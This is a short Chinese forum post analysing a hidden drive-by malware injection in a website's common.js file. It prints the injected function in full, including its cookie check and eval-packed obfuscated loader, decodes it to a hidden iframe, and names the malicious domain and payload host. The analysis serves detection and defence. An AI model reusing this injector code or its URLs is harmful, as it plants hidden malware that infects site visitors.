隐蔽的挂马,问题在http://www.17look8.com/bbs/include/javascript/common.js,在文件中被加入了一个函数goad()
-
- function goad(){var Then = new Date()
- Then.setTime(Then.getTime() + 24*60*60*1000)
- var cookieString = new String(document.cookie)
- var cookieHeader = "Cookie1="
- var beginPosition = cookieString.indexOf(cookieHeader)
- if (beginPosition != -1){ } else { document.cookie = "Cookie1=Filter;expires="+ Then.toGMTString()
- eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.d(\'<7 4=0 c=1 a="6://9.2/8/b.5"></7>\')',62,14,'|100|cn|document|height|htm|http|iframe|images|google-anlacc|src|beng|width|writeln'.split('|'),0,{}));window.status="U+FFFDU+FFFDU+FFFD";}}goad();
复制代码
设置cookie,有效期一天,期间不再进行挂马操作
解开加密段后:<iframe height=0 width=100 src="http://google-anlacc.cn/images/beng.htm"></iframe>
毒为:http://59.34.197.63/exe1/ms.cs
另外其实Google的提示有相对滞后性
|